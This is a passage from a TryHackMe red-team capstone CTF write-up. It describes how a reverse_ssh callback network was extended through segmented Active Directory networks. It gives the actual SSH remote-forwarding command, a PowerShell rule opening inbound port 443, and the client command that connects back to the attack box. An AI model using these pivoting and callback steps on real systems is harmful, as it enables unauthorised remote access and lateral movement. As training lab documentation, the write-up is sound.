ChrisPritchard/ctf-writeups/tryhackme-rooms/red-team-capstone-challenge/report.md

 With the above, this sets up the server to listen on the VPN's local IP, port 443 (which is less likely to be blocked by firewalls, though that wasn't universally the case here).
 Additionally, the client binaries (a windows `client.exe` and a linux `client`) were copied to the home directory of the current user, ready to be uploaded to targets.

+In this network, different segments were unable to reach other segments.
+Notably, from CORP only WRK1 and WRK2 could reach the attack box over the VPN, and only the root DC could see WRK1 and WRK2, nothing from the BANK domain.
+The way the connection back to the reverse_ssh server was propagated was via SSH remote forwarding:

+- once a client connection was done on a server, it became possible to perform SSH remote forwarding.
+- a command like `ssh -J localhost:443 -R 10.200.116.21:443:localhost:443 [.21_CLIENT_ID]` was run, which exposed the local server port on the target machine on 443.
+- Usually this also required making that port reachable on the target, by running a firewall command: `New-NetFirewallRule -DisplayName "Required Port" -Direction inbound -Profile Any -Action Allow -LocalPort 443 -Protocol TCP`
+- When the client was run on a later machine, it would be run like `.\client.exe -d 10.200.116.21:443`, to forward its connection through the remote port and back to the attack box.

+As the new connection was created, the process could be repeated to extend the reverse_ssh network through the AD forest.

 ## Stage 1: OSINT of the external interfaces, and getting a foothold

 On top of the access to the network, a `password_base_list.txt` and `password_policy.txt` were provided.
 The policy stated: